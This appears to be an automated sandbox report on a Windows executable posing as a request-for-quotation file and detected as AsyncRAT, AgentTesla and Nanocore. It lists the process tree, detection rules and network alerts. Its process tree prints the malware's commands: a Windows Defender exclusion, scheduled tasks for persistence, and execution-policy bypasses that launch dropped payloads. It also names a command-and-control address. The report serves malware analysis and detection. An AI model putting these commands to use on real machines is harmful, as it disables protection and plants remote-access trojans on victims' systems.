Loading ...

Play interactive tourEdit tour

Windows Analysis Report RFQ_GGMC-Ref 12-01-2022.exe

Overview

General Information

Sample Name:RFQ_GGMC-Ref 12-01-2022.exe
Analysis ID:551470
MD5:9fd45110bad75cda6de67232014aeb6e
SHA1:a43016fa816afd1693fb7f266dd032fd7f061c35
SHA256:b586ca95ba9557f7ad2434d01f96ff191b77541670894df3b78aa3a8312ae092
Tags:AsyncRATexe
Infos:

Most interesting Screenshot:

Detection

AgentTesla AsyncRAT Nanocore
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Telegram RAT
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected AsyncRAT
Yara detected Nanocore RAT
Sigma detected: Suspicious Script Execution From Temp Folder
Bypasses PowerShell execution policy
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected Costura Assembly Loader
Sigma detected: Suspicius Add Task From User AppData Temp
Suspicious powershell command line found
.NET source code contains potential unpacker
Sigma detected: Powershell Defender Exclusion
.NET source code contains method to dynamically call methods (often used by packers)
Adds a directory exclusion to Windows Defender
Uses schtasks.exe or at.exe to add and modify task schedules
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • RFQ_GGMC-Ref 12-01-2022.exe (PID: 6964 cmdline: "C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe" MD5: 9FD45110BAD75CDA6DE67232014AEB6E)
    • powershell.exe (PID: 6080 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lhWbLvHNlciwu.exe MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 6136 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lhWbLvHNlciwu" /XML "C:\Users\user\AppData\Local\Temp\tmp71CD.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 5800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • RFQ_GGMC-Ref 12-01-2022.exe (PID: 7000 cmdline: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe MD5: 9FD45110BAD75CDA6DE67232014AEB6E)
    • RFQ_GGMC-Ref 12-01-2022.exe (PID: 6948 cmdline: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe MD5: 9FD45110BAD75CDA6DE67232014AEB6E)
      • cmd.exe (PID: 5684 cmdline: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "mozille" /tr '"C:\Users\user\AppData\Local\Temp\mozille.exe"' & exit MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 5852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 5580 cmdline: schtasks /create /f /sc onlogon /rl highest /tn "mozille" /tr '"C:\Users\user\AppData\Local\Temp\mozille.exe"' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • cmd.exe (PID: 3868 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpB8D1.tmp.bat"" MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 6276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • conhost.exe (PID: 2532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • timeout.exe (PID: 2292 cmdline: timeout 3 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
        • mozille.exe (PID: 6564 cmdline: "C:\Users\user\AppData\Local\Temp\mozille.exe" MD5: 9FD45110BAD75CDA6DE67232014AEB6E)
          • powershell.exe (PID: 5452 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lhWbLvHNlciwu.exe MD5: DBA3E6449E97D4E3DF64527EF7012A10)
  • mozille.exe (PID: 6316 cmdline: C:\Users\user\AppData\Local\Temp\mozille.exe MD5: 9FD45110BAD75CDA6DE67232014AEB6E)
    • powershell.exe (PID: 5400 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lhWbLvHNlciwu.exe MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 5192 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lhWbLvHNlciwu" /XML "C:\Users\user\AppData\Local\Temp\tmpCDE7.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 6444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • mozille.exe (PID: 6620 cmdline: C:\Users\user\AppData\Local\Temp\mozille.exe MD5: 9FD45110BAD75CDA6DE67232014AEB6E)
      • cmd.exe (PID: 5000 cmdline: "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\jzhlgt.exe"' & exit MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 6876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • powershell.exe (PID: 5648 cmdline: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\jzhlgt.exe"' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
          • jzhlgt.exe (PID: 6500 cmdline: "C:\Users\user\AppData\Local\Temp\jzhlgt.exe" MD5: 76F7AB6A302E47D7F7FDB4EA2540323E)
            • jzhlgt.exe (PID: 5964 cmdline: C:\Users\user\AppData\Local\Temp\jzhlgt.exe MD5: 76F7AB6A302E47D7F7FDB4EA2540323E)
            • jzhlgt.exe (PID: 3076 cmdline: C:\Users\user\AppData\Local\Temp\jzhlgt.exe MD5: 76F7AB6A302E47D7F7FDB4EA2540323E)
      • cmd.exe (PID: 3312 cmdline: "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\dlliok.exe"' & exit MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 6856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • powershell.exe (PID: 4636 cmdline: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\dlliok.exe"' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
          • dlliok.exe (PID: 2804 cmdline: "C:\Users\user\AppData\Local\Temp\dlliok.exe" MD5: 8B4D4FC3E962F26A4C74120F33BB7460)
            • powershell.exe (PID: 6276 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pLrWNKFD.exe MD5: DBA3E6449E97D4E3DF64527EF7012A10)
            • schtasks.exe (PID: 4872 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pLrWNKFD" /XML "C:\Users\user\AppData\Local\Temp\tmp9C7F.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
              • conhost.exe (PID: 4740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • dlliok.exe (PID: 1316 cmdline: C:\Users\user\AppData\Local\Temp\dlliok.exe MD5: 8B4D4FC3E962F26A4C74120F33BB7460)
              • schtasks.exe (PID: 4412 cmdline: schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmpAD4.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
                • conhost.exe (PID: 6124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • dlliok.exe (PID: 6844 cmdline: C:\Users\user\AppData\Local\Temp\dlliok.exe 0 MD5: 8B4D4FC3E962F26A4C74120F33BB7460)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000028.00000002.578366682.0000000005520000.00000004.00020000.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0xe75:$x1: NanoCore.ClientPluginHost
  • 0xe8f:$x2: IClientNetworkHost
00000028.00000002.578366682.0000000005520000.00000004.00020000.sdmpNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
  • 0xe75:$x2: NanoCore.ClientPluginHost
  • 0x1261:$s3: PipeExists
  • 0x1136:$s4: PipeCreated
  • 0xeb0:$s5: IClientLoggingHost
0000001D.00000000.485797688.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    0000001D.00000000.485797688.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      00000015.00000002.564363154.0000000000402000.00000040.00000001.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
        Click to see the 64 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        7.0.RFQ_GGMC-Ref 12-01-2022.exe.400000.10.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
          7.0.RFQ_GGMC-Ref 12-01-2022.exe.400000.4.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
            7.0.RFQ_GGMC-Ref 12-01-2022.exe.400000.6.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
              7.2.RFQ_GGMC-Ref 12-01-2022.exe.400000.0.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
                7.0.RFQ_GGMC-Ref 12-01-2022.exe.400000.12.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
                  Click to see the 6 entries

                  Sigma Overview

                  System Summary:

                  barindex
                  Sigma detected: Suspicious Script Execution From Temp FolderShow sources
                  Source: Process startedAuthor: Florian Roth, Max Altgelt: Data: Command: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\jzhlgt.exe"' , CommandLine: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\jzhlgt.exe"' , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\jzhlgt.exe"' & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5000, ProcessCommandLine: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\jzhlgt.exe"' , ProcessId: 5648
                  Sigma detected: Suspicius Add Task From User AppData TempShow sources
                  Source: Process startedAuthor: frack113: Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lhWbLvHNlciwu" /XML "C:\Users\user\AppData\Local\Temp\tmp71CD.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lhWbLvHNlciwu" /XML "C:\Users\user\AppData\Local\Temp\tmp71CD.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe" , ParentImage: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe, ParentProcessId: 6964, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lhWbLvHNlciwu" /XML "C:\Users\user\AppData\Local\Temp\tmp71CD.tmp, ProcessId: 6136
                  Sigma detected: Powershell Defender ExclusionShow sources
                  Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lhWbLvHNlciwu.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lhWbLvHNlciwu.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe" , ParentImage: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe, ParentProcessId: 6964, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lhWbLvHNlciwu.exe, ProcessId: 6080
                  Sigma detected: Non Interactive PowerShellShow sources
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lhWbLvHNlciwu.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lhWbLvHNlciwu.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe" , ParentImage: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe, ParentProcessId: 6964, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lhWbLvHNlciwu.exe, ProcessId: 6080
                  Sigma detected: T1086 PowerShell ExecutionShow sources
                  Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132864805308084968.6080.DefaultAppDomain.powershell

                  Jbx Signature Overview

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection:

                  barindex
                  Multi AV Scanner detection for submitted fileShow sources
                  Source: RFQ_GGMC-Ref 12-01-2022.exeVirustotal: Detection: 26%Perma Link
                  Yara detected Nanocore RATShow sources
                  Source: Yara matchFile source: 00000028.00000000.532162937.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000028.00000000.533503527.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000028.00000002.575326002.0000000003B89000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000028.00000000.534610587.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000028.00000000.531340924.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000028.00000002.578385897.0000000005530000.00000004.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000021.00000002.539866646.00000000043B9000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000028.00000002.564500309.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000028.00000002.572373638.0000000002B81000.00000004.00000001.sdmp, type: MEMORY
                  Source: 7.0.RFQ_GGMC-Ref 12-01-2022.exe.400000.4.unpackAvira: Label: TR/Dropper.Gen
                  Source: 7.0.RFQ_GGMC-Ref 12-01-2022.exe.400000.10.unpackAvira: Label: TR/Dropper.Gen
                  Source: 7.0.RFQ_GGMC-Ref 12-01-2022.exe.400000.6.unpackAvira: Label: TR/Dropper.Gen
                  Source: 7.2.RFQ_GGMC-Ref 12-01-2022.exe.400000.0.unpackAvira: Label: TR/Dropper.Gen
                  Source: 7.0.RFQ_GGMC-Ref 12-01-2022.exe.400000.12.unpackAvira: Label: TR/Dropper.Gen
                  Source: 7.0.RFQ_GGMC-Ref 12-01-2022.exe.400000.8.unpackAvira: Label: TR/Dropper.Gen
                  Source: RFQ_GGMC-Ref 12-01-2022.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                  Source: RFQ_GGMC-Ref 12-01-2022.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                  Source: Binary string: IDescriptionMetadataEnt.pdb source: mozille.exe, mozille.exe, 0000000F.00000000.372058011.0000000000F12000.00000002.00020000.sdmp

                  Networking:

                  barindex
                  Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                  Source: TrafficSnort IDS: 2030673 ET TROJAN Observed Malicious SSL Cert (AsyncRAT Server) 89.238.150.43:5512 -> 192.168.2.3:49720
                  Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49729 -> 89.238.150.43:5512
                  Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49730 -> 89.238.150.43:5512
                  Source: global trafficTCP traffic: 192.168.2.3:49720 -> 89.238.150.43:5512
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.238.150.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.238.150.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.238.150.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.238.150.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.238.150.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.238.150.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.238.150.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.238.150.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.238.150.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.238.150.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.238.150.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.238.150.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.238.150.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.238.150.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.238.150.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.238.150.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.238.150.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.238.150.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.238.150.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.238.150.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.238.150.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.238.150.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.238.150.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.238.150.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.238.150.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.238.150.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.238.150.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.238.150.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.238.150.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.238.150.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.238.150.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.238.150.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.238.150.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.238.150.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.238.150.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.238.150.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.238.150.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.238.150.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.238.150.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.238.150.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.238.150.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.238.150.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.238.150.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.238.150.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.238.150.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.238.150.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.238.150.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.238.150.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.238.150.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.238.150.43
                  Source: mozille.exeString found in binary or memory: http://ati.amd.com/developer/compressonator.html
                  Source: mozille.exeString found in binary or memory: http://developer.nvidia.com/object/dds_thumbnail_viewer.html
                  Source: mozille.exeString found in binary or memory: http://developer.nvidia.com/object/photoshop_dds_plugins.html
                  Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000000.294283178.0000000000392000.00000002.00020000.sdmp, RFQ_GGMC-Ref 12-01-2022.exe, 00000005.00000000.327586416.0000000000162000.00000002.00020000.sdmp, RFQ_GGMC-Ref 12-01-2022.exe, 00000007.00000000.333928558.0000000000582000.00000002.00020000.sdmp, RFQ_GGMC-Ref 12-01-2022.exe, 00000007.00000002.361685768.0000000003B04000.00000004.00000001.sdmp, mozille.exe, 0000000E.00000000.362803086.0000000000262000.00000002.00020000.sdmp, mozille.exe, 0000000F.00000000.372058011.0000000000F12000.00000002.00020000.sdmpString found in binary or memory: http://developer.nvidia.com/object/photoshop_dds_plugins.htmlyhttp://developer.nvidia.com/object/dds
                  Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
                  Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.338715728.0000000003709000.00000004.00000001.sdmp, mozille.exe, 0000000E.00000002.394466512.0000000003659000.00000004.00000001.sdmp, mozille.exe, 0000000F.00000002.575440695.00000000042C9000.00000004.00000001.sdmpString found in binary or memory: http://igaeJZ.so
                  Source: mozille.exe, mozille.exe, 0000000F.00000002.575440695.00000000042C9000.00000004.00000001.sdmp, mozille.exe, 0000000F.00000002.580953387.00000000078F0000.00000004.00020000.sdmpString found in binary or memory: http://igaeditor.sourceforge.net/
                  Source: mozille.exe, mozille.exe, 0000000F.00000000.372058011.0000000000F12000.00000002.00020000.sdmpString found in binary or memory: http://igaeditor.sourceforge.net/latest.txt
                  Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000000.294283178.0000000000392000.00000002.00020000.sdmp, RFQ_GGMC-Ref 12-01-2022.exe, 00000005.00000000.327586416.0000000000162000.00000002.00020000.sdmp, RFQ_GGMC-Ref 12-01-2022.exe, 00000007.00000000.333928558.0000000000582000.00000002.00020000.sdmp, RFQ_GGMC-Ref 12-01-2022.exe, 00000007.00000002.361685768.0000000003B04000.00000004.00000001.sdmp, mozille.exe, 0000000E.00000000.362803086.0000000000262000.00000002.00020000.sdmp, mozille.exe, 0000000F.00000000.372058011.0000000000F12000.00000002.00020000.sdmpString found in binary or memory: http://igaeditor.sourceforge.net/ohttp://www.totalbf2142.com/forums/showthread.php?t=5342
                  Source: mozille.exeString found in binary or memory: http://igaeditor.sourceforge.net/wiki/
                  Source: mozille.exe, 0000000F.00000002.575440695.00000000042C9000.00000004.00000001.sdmpString found in binary or memory: http://micolous.id.au
                  Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.341191488.0000000006C10000.00000004.00020000.sdmp, RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.338715728.0000000003709000.00000004.00000001.sdmp, mozille.exe, 0000000E.00000002.396925002.0000000006750000.00000004.00020000.sdmp, mozille.exe, 0000000E.00000002.394466512.0000000003659000.00000004.00000001.sdmp, mozille.exe, 0000000F.00000002.575440695.00000000042C9000.00000004.00000001.sdmp, mozille.exe, 0000000F.00000002.580953387.00000000078F0000.00000004.00020000.sdmpString found in binary or memory: http://micolous.id.au/
                  Source: mozille.exeString found in binary or memory: http://micolous.id.au/projects/bf21
                  Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.341191488.0000000006C10000.00000004.00020000.sdmp, RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.338715728.0000000003709000.00000004.00000001.sdmp, mozille.exe, 0000000E.00000002.396925002.0000000006750000.00000004.00020000.sdmp, mozille.exe, 0000000E.00000002.394466512.0000000003659000.00000004.00000001.sdmp, mozille.exe, 0000000F.00000002.575440695.00000000042C9000.00000004.00000001.sdmp, mozille.exe, 0000000F.00000002.580953387.00000000078F0000.00000004.00020000.sdmpString found in binary or memory: http://micolous.id.au/projects/bf2142/
                  Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000000.294283178.0000000000392000.00000002.00020000.sdmp, RFQ_GGMC-Ref 12-01-2022.exe, 00000005.00000000.327586416.0000000000162000.00000002.00020000.sdmp, RFQ_GGMC-Ref 12-01-2022.exe, 00000007.00000000.333928558.0000000000582000.00000002.00020000.sdmp, RFQ_GGMC-Ref 12-01-2022.exe, 00000007.00000002.361685768.0000000003B04000.00000004.00000001.sdmp, mozille.exe, 0000000E.00000000.362803086.0000000000262000.00000002.00020000.sdmp, mozille.exe, 0000000F.00000000.372058011.0000000000F12000.00000002.00020000.sdmpString found in binary or memory: http://micolous.id.au/projects/bf2142/.
                  Source: mozille.exeString found in binary or memory: http://registry.gimp.org/plugin?id=4816
                  Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.338424053.0000000002701000.00000004.00000001.sdmp, RFQ_GGMC-Ref 12-01-2022.exe, 00000007.00000002.360806225.0000000002B36000.00000004.00000001.sdmp, mozille.exe, 0000000E.00000002.393670309.0000000002651000.00000004.00000001.sdmp, mozille.exe, 0000000F.00000002.572294732.00000000032C1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                  Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
                  Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
                  Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                  Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                  Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                  Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                  Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                  Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                  Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
